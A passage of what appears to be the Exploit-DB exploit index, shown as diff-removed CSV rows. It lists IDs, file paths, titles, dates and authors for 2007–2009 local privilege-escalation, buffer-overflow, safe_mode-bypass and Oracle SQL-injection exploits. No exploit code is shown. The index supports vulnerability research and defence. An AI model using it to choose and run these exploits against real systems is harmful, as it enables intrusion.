Capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local, -4232,exploits/aix/local/4232.sh,"IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local, -4233,exploits/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP 'gets()' Local Privilege Escalation",2007-07-27,qaaz,aix,local, -4236,exploits/windows/local/4236.php,"PHP 5.x - 'Win32service' Local 'Safe_Mode()' Bypass",2007-07-27,NetJackal,windows,local, -4252,exploits/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Local Buffer Overflow",2007-08-01,n00b,windows,local, -4257,exploits/windows/local/4257.c,"Panda AntiVirus 2008 - Local Privilege Escalation",2007-08-05,tarkus,windows,local, -4262,exploits/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - '.ply' Local Buffer Overflow",2007-08-06,n00b,windows,local, -4263,exploits/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - '.spr' Local Buffer Overflow",2007-08-06,n00b,windows,local, -4270,exploits/windows/local/4270.php,"PHP mSQL (msql_connect) - Local Buffer Overflow",2007-08-08,Inphex,windows,local, -4274,exploits/windows/local/4274.php,"PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)",2007-08-09,Inphex,windows,local, -4302,exploits/windows/local/4302.php,"PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local, -4303,exploits/windows/local/4303.php,"PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local, -4311,exploits/windows/local/4311.php,"PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass",2007-08-23,NetJackal,windows,local, -4314,exploits/windows/local/4314.php,"PHP 'Perl' Extension - 'Safe_mode' Bypass",2007-08-25,NetJackal,windows,local, -4325,exploits/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Local Privilege Escalation",2007-08-27,Inphex,windows,local, -4345,exploits/windows/local/4345.c,"Norman Virus Control - 'nvcoaft51.sys' ioctl BF672028",2007-08-30,inocraM,windows,local, -4354,exploits/windows/local/4354.py,"Virtual DJ 5.0 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local, -4355,exploits/windows/local/4355.php,"OtsTurntables 1.00 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local, -4361,exploits/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec",2007-09-04,Koshi,windows,local, -4364,exploits/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local, -4392,exploits/multiple/local/4392.txt,"PHP 4.4.7/5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass",2007-09-10,"Mattias Bengtsson",multiple,local, -4431,exploits/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local, -4460,exploits/lin_x86-64/local/4460.c,"Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",lin_x86-64,local, -4515,exploits/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local, -4516,exploits/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local, -4517,exploits/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,windows,local, -4531,exploits/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local, -4553,exploits/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,windows,local, -4564,exploits/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local, -4570,exploits/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,multiple,local, -4571,exploits/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,multiple,local, -4572,exploits/multiple/local/4572.txt,"Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)",2007-10-27,sh2kerr,multiple,local, -4583,exploits/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local, -4584,exploits/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local, -4612,exploits/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Local Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local, -4625,exploits/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local, -4698,exploits/linux/local/4698.c,"Send ICMP Nasty Garbage (SING) - Append File Logrotate",2007-12-06,bannedit,linux,local, -4701,exploits/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local, -4702,exploits/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local, -4703,exploits/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local, -4749,exploits/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Local Stack Overflow",2007-12-18,devcode,windows,local, -4751,exploits/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Local Stack Overflow",2007-12-18,"SYS 49152",windows,local, -4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local, -4759,exploits/osx/local/4759.c,"Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",osx,local, -4839,exploits/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Local Stack Overflow",2008-01-05,Trancek,windows,local, -4892,exploits/windows/local/4892.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local, -4938,exploits/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local, -4994,exploits/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' Get Users Hash / PL/SQL Injection",2008-01-28,sh2kerr,multiple,local, -4995,exploits/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' Get Users Hash / PL/SQL Injection",2008-01-28,sh2kerr,multiple,local, -4996,exploits/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (Change Sys Password)",2008-01-28,sh2kerr,multiple,local, -4998,exploits/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local, -5004,exploits/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM",2008-01-29,mu-b,windows,local, -5032,exploits/windows/local/5032.c,"Total Video Player 1.03 - '.m3u' File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local, -5077,exploits/windows/local/5077.cpp,"Total Video Player 1.20 - '.m3u' File Local Stack Buffer Overflow",2008-02-07,"fl0 fl0w",windows,local, -5092,exploits/linux/local/5092.c,"Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)",2008-02-09,qaaz,linux,local, -5093,exploits/linux/local/5093.c,"Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)",2008-02-09,qaaz,linux,local, -5107,exploits/windows/local/5107.c,"Microsoft Office 2003 - '.wps' Local Stack Overflow (MS08-011)",2008-02-13,chujwamwdupe,windows,local, -5141,exploits/windows/local/5141.c,"DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local, -5143,exploits/windows/local/5143.c,"DESlock+ < 3.2.6 - Local Kernel Ring0 link list zero SYSTEM",2008-02-18,mu-b,windows,local, -5144,exploits/windows/local/5144.c,"DESlock+ < 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM",2008-02-18,mu-b,windows,local, -5167,exploits/linux/local/5167.sh,"X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition",2008-02-21,vl4dZ,linux,local, -5227,exploits/solaris/local/5227.c,"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak",2008-03-10,"Marco Ivaldi",solaris,local, -5250,exploits/windows/local/5250.cpp,"VideoLAN VLC Media Player 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",windows,local, -5287,exploits/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local, -5320,exploits/windows/local/5320.txt,"Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local, -5346,exploits/windows/local/5346.pl,"XnView 1.92.1 - 'FontName' Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local, -5355,exploits/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Local Privilege Escalation",2008-04-04,qaaz,sco,local, -5356,exploits/sco/local/5356.c,"SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation",2008-04-04,qaaz,sco,local, -5357,exploits/sco/local/5357.c,"SCO UnixWare Merge - 'mcd' Local Privilege Escalation",2008-04-04,qaaz,sco,local, -5424,exploits/linux/local/5424.txt,"AlsaPlayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",linux,local, -5442,exploits/windows/local/5442.cpp,"Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021)",2008-04-14,Lamhtz,windows,local, -5462,exploits/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)",2008-04-18,muts,windows,local, -5479,exploits/windows/local/5479.txt,"Adobe Album Starter 3.2 - Unchecked Local Buffer Overflow",2008-04-21,c0ntex,windows,local, -5492,exploits/windows/local/5492.cpp,"DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow",2008-04-24,lhoang8500,windows,local, -5498,exploits/windows/local/5498.py,"Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow",2008-04-25,j0rgan,windows,local, -5518,exploits/windows/local/5518.txt,"Microsoft Windows XP SP2 - 'win32k.sys' Local Privilege Escalation (MS08-025)",2008-04-28,"Ruben Santamarta",windows,local, -5584,exploits/windows/local/5584.c,"Open Office.org 2.31 - swriter Local Code Execution",2008-05-10,Marsu,windows,local, -5625,exploits/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation",2008-05-15,"Alex Hernandez",windows,local, -5667,exploits/windows/local/5667.py,"VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal",2008-05-23,j0rgan,windows,local, -5837,exploits/windows/local/5837.c,"Deterministic Network Enhancer - 'dne2000.sys' Kernel Ring0 SYSTEM",2008-06-17,mu-b,windows,local, -5951,exploits/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,windows,local, -5979,exploits/openbsd/local/5979.c,"OpenBSD 4.0 - 'vga' Local Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local, -6030,exploits/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local, -6031,exploits/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local, -6032,exploits/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local, -6039,exploits/windows/local/6039.c,"Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow",2008-07-11,Shinnok,windows,local, -6106,exploits/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)",2008-07-21,"Guido Landi",windows,local, -6157,exploits/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local, -6188,exploits/windows/local/6188.c,"IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local, -6322,exploits/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - 'mx4' Local Buffer Overflow",2008-08-28,Koshi,windows,local, -6329,exploits/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local, -6333,exploits/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local, -6337,exploits/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local, -6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local, -6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local (PoC)",2008-10-08,"Cesar Cerrudo",windows,local, -6757,exploits/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local, -6787,exploits/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Local Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local, -6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local, -6825,exploits/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local, -6831,exploits/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local, -6851,exploits/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation",2008-10-27,gat3way,linux,local, -6994,exploits/windows/local/6994.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (1)",2008-11-05,Elazar,windows,local, -7006,exploits/windows/local/7006.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local, -7051,exploits/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Local Stack Buffer Overflow",2008-11-07,SkD,windows,local, -7054,exploits/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - 'AKEProtect.sys' Local Privilege Escalation",2008-11-07,"NT Internals",windows,local, -7129,exploits/multiple/local/7129.sh,"Sudo 1.6.9p18 - 'Defaults SetEnv' Local Privilege Escalation",2008-11-15,kingcope,multiple,local, -7135,exploits/windows/local/7135.html,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local, -7171,exploits/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local, -7177,exploits/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Local Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local, -40988,exploits/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA Root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local, -7264,exploits/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Local Privilege Escalation",2008-11-28,Abysssec,windows,local, -7309,exploits/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Local Stack Overflow",2008-11-30,SkD,windows,local, -7313,exploits/linux/local/7313.sh,"Debian - Symlink In Login Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local, -7329,exploits/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Local Buffer Overflow",2008-12-03,Encrypt3d.M!nd,windows,local, -7334,exploits/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack",2008-12-03,DATA_SNIPER,windows,local, -7347,exploits/windows/local/7347.pl,"PEiD 0.92 - '.PE' File Universal Buffer Overflow",2008-12-05,SkD,windows,local, -7393,exploits/linux/local/7393.txt,"PHP - 'Safe_mode' Bypass via 'proc_open()' and custom Environment",2008-12-09,gat3way,linux,local, -7492,exploits/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - Playlist Buffer Overflow",2008-12-16,shinnai,windows,local, -7501,exploits/windows/local/7501.asp,"Microsoft SQL Server - 'sp_replwritetovarbin()' Heap Overflow",2008-12-17,"Guido Landi",windows,local, -7503,exploits/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass",2008-12-17,"Amir Salmani",multiple,local, -7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",windows,local, -7533,exploits/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Local Privilege Escalation",2008-12-21,"NT Internals",windows,local, -7536,exploits/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local, -7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local, -7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local, -7577,exploits/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local, -7581,exploits/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Local Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local, -7582,exploits/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local, -7608,exploits/windows/local/7608.py,"IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow",2008-12-29,His0k4,windows,local, -7618,exploits/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local, -7646,exploits/multiple/local/7646.txt,"PHP 5.2.8 gd library - 'imageRotate()' Information Leak",2009-01-02,"Hamid Ebadi",multiple,local, -7651,exploits/windows/local/7651.py,"Destiny Media Player 1.61 - '.m3u' Local Stack Overflow",2009-01-03,His0k4,windows,local, -7654,exploits/windows/local/7654.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)",2009-01-04,Encrypt3d.M!nd,windows,local, -7655,exploits/windows/local/7655.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (2)",2009-01-04,sCORPINo,windows,local, -7656,exploits/windows/local/7656.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (3)",2009-01-04,Houssamix,windows,local, -7661,exploits/windows/local/7661.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (4)",2009-01-04,Stack,windows,local, -7662,exploits/windows/local/7662.py,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (5)",2009-01-04,suN8Hclf,windows,local, -7671,exploits/windows/local/7671.pl,"VUPlayer 2.49 - '.wax' Local Buffer Overflow",2009-01-05,Houssamix,windows,local, -7675,exploits/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local, -7676,exploits/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local, -7677,exploits/multiple/local/7677.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (1)",2009-01-06,sh2kerr,multiple,local, -7681,exploits/linux/local/7681.txt,"Debian XTERM - 'DECRQSS/comments' Code Execution",2009-01-06,"Paul Szabo",linux,local, -7684,exploits/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local, -7688,exploits/windows/local/7688.pl,"Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow",2009-01-07,send9,windows,local, -7692,exploits/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Local Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local, -7695,exploits/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local, -7702,exploits/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Local Stack Overflow",2009-01-08,DATA_SNIPER,windows,local, -7707,exploits/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog Overflow (SEH)",2009-01-08,Cnaph,windows,local, -7713,exploits/windows/local/7713.pl,"VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (2)",2009-01-09,Houssamix,windows,local, -7714,exploits/windows/local/7714.pl,"VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (1)",2009-01-11,sCORPINo,windows,local, -7715,exploits/windows/local/7715.py,"VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow",2009-01-11,His0k4,windows,local, -7727,exploits/windows/local/7727.pl,"Microsoft HTML Workshop 4.74 - Universal Buffer Overflow",2009-01-12,SkD,windows,local, -7745,exploits/windows/local/7745.py,"VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,windows,local, -7765,exploits/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,windows,local, -7839,exploits/windows/local/7839.py,"Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow",2009-01-20,His0k4,windows,local, -7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local, -7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,windows,local, -7853,exploits/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local, -7855,exploits/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local, -7856,exploits/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local, -7888,exploits/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow",2009-01-28,Houssamix,windows,local, -7923,exploits/windows/local/7923.c,"Total Video Player 1.3.7 - '.m3u' Local Buffer Overflow",2009-01-29,SimO-s0fT,windows,local, -7929,exploits/windows/local/7929.c,"GOM Player 2.0.12 - '.pls' Universal Buffer Overflow",2009-01-30,Stack,windows,local, -7957,exploits/windows/local/7957.pl,"Free Download Manager 3.0 Build 844 - '.torrent' Local Buffer Overflow",2009-02-03,SkD,windows,local, -7958,exploits/windows/local/7958.pl,"Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow",2009-02-03,h4ck3r#47,windows,local, -7973,exploits/windows/local/7973.pl,"Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow",2009-02-04,Houssamix,windows,local, -7974,exploits/windows/local/7974.c,"Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow",2009-02-04,"Single Eye",windows,local, -7975,exploits/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow",2009-02-04,LiquidWorm,windows,local, -7994,exploits/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local, -8010,exploits/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local, -8055,exploits/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation",2009-02-16,kingcope,freebsd,local, -8067,exploits/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local, -8074,exploits/multiple/local/8074.rb,"Oracle 10g - MDSYS.SDO_TOPO_DROP_FTBL SQL Injection (Metasploit)",2009-02-18,sh2kerr,multiple,local, -8108,exploits/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local, -8121,exploits/windows/local/8121.pl,"Hex Workshop 6.0 - '.hex' Local Code Execution",2009-02-27,DATA_SNIPER,windows,local, -8126,exploits/windows/local/8126.py,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH)",2009-03-02,Encrypt3d.M!nd,windows,local, -8137,exploits/windows/local/8137.py,"Media Commands - '.m3u' Local Overwrite (SEH)",2009-03-02,His0k4,windows,local, -8138,exploits/windows/local/8138.c,"VUplayer 2.49 - '.cue' Local Buffer Overflow",2009-03-02,"Assed Edin",windows,local, -8158,exploits/windows/local/8158.pl,"Winamp 5.541 - Skin Universal Buffer Overflow",2009-03-05,SkD,windows,local, -8159,exploits/windows/local/8159.rb,"Media Commands - '.m3l' File Local Buffer Overflow",2009-03-05,Stack,windows,local, -8162,exploits/windows/local/8162.py,"Media Commands - '.m3u' Universal Overwrite (SEH)",2009-03-05,His0k4,windows,local, -8171,exploits/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - Playlist Universal Overwrite (SEH)",2009-03-09,His0k4,windows,local, -8174,exploits/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local, -8175,exploits/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - 'mksmonen.sys' Local Privilege Escalation",2009-03-09,"NT Internals",windows,local, -8176,exploits/windows/local/8176.py,"EO Video 1.36 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local, -8177,exploits/windows/local/8177.py,"RadASM 2.2.1.5 - '.rap' Local Stack Overflow",2009-03-09,zAx,windows,local, -8178,exploits/windows/local/8178.pl,"Mediacoder 0.6.2.4275 - '.m3u' Universal Stack Overflow",2009-03-09,Stack,windows,local, -8179,exploits/windows/local/8179.rb,"Mediacoder 0.6.2.4275 - Universal Buffer Overflow (SEH)",2009-03-09,Stack,windows,local, -8189,exploits/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local, -8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,windows,local, -8201,exploits/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow",2009-03-13,SkD,windows,local, -8214,exploits/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-03-16,SimO-s0fT,windows,local, -8231,exploits/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - '.ogg' Local Buffer Overflow",2009-03-18,Nine:Situations:Group,windows,local, -8233,exploits/windows/local/8233.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow",2009-03-18,His0k4,windows,local, -8234,exploits/windows/local/8234.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow (2)",2009-03-18,Encrypt3d.M!nd,windows,local, -8235,exploits/windows/local/8235.py,"Chasys Media Player 1.1 - '.m3u' Local Stack Overflow",2009-03-18,Encrypt3d.M!nd,windows,local, -8236,exploits/windows/local/8236.py,"Icarus 2.0 - '.pgn' Local Stack Overflow (SEH)",2009-03-18,His0k4,windows,local, -8242,exploits/windows/local/8242.rb,"Chasys Media Player 1.1 - '.cue' Local Stack Overflow",2009-03-19,Stack,windows,local, -8246,exploits/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local, -8249,exploits/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local, -8250,exploits/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Local Privilege Escalation",2009-03-20,"NT Internals",windows,local, -8251,exploits/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local, -8261,exploits/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Local Privilege Escalation",2009-03-23,mu-b,freebsd,local, -8266,exploits/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation",2009-03-23,mu-b,osx,local, -8267,exploits/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)",2009-03-23,His0k4,windows,local, -8270,exploits/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local, -8274,exploits/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local, 